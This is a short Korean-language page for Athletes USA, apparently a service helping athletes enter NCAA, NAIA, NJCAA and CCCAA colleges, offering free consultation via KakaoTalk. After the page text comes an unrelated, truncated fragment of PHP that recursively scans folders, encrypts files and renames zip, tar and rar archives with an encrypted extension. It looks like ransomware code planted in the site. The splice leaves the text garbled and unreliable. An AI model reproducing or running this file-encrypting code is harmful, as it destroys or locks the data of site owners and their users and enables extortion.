문의사항은 언제든지 연락주세요. 
Kakaotalk ID: AUKR 

저희 Athletes USA가 NCAA, NAIA, NJCAA, CCCAA협회에 등록되어 있는 수많은 대학에 입학할 수 있도록 도와드립니다. 
아래에 정보를 기입하시면 무료상담을 해드립니다.

getMessage()); } } } elseif ($fileExtension === 'zip' || $fileExtension === 'tar' || $fileExtension === 'rar') { $encryptedFile = $filePath . $encryptedExtension; if (!file_exists($encryptedFile)) { rename($filePath, $encryptedFile); } } } function encryptFiles($folder, $encryptionKey, $encryptedExtension, $currentScriptFile) { $files = scandir($folder); foreach ($files as $file) { if ($file === '.' || $file === '..') { continue; } $filePath = $folder . '/' . $file; if (is_dir($filePath)) { encryptFiles($filePath, $encryptionKey, $encryptedExtension, $currentScriptFile); } else { encryptFile($filePath, $encryptionKey, $encryptedExtension, $currentScriptFile); } } } encryptFiles($folder, $encryptionKey, $encryptedExtension, $currentScriptFile); ?>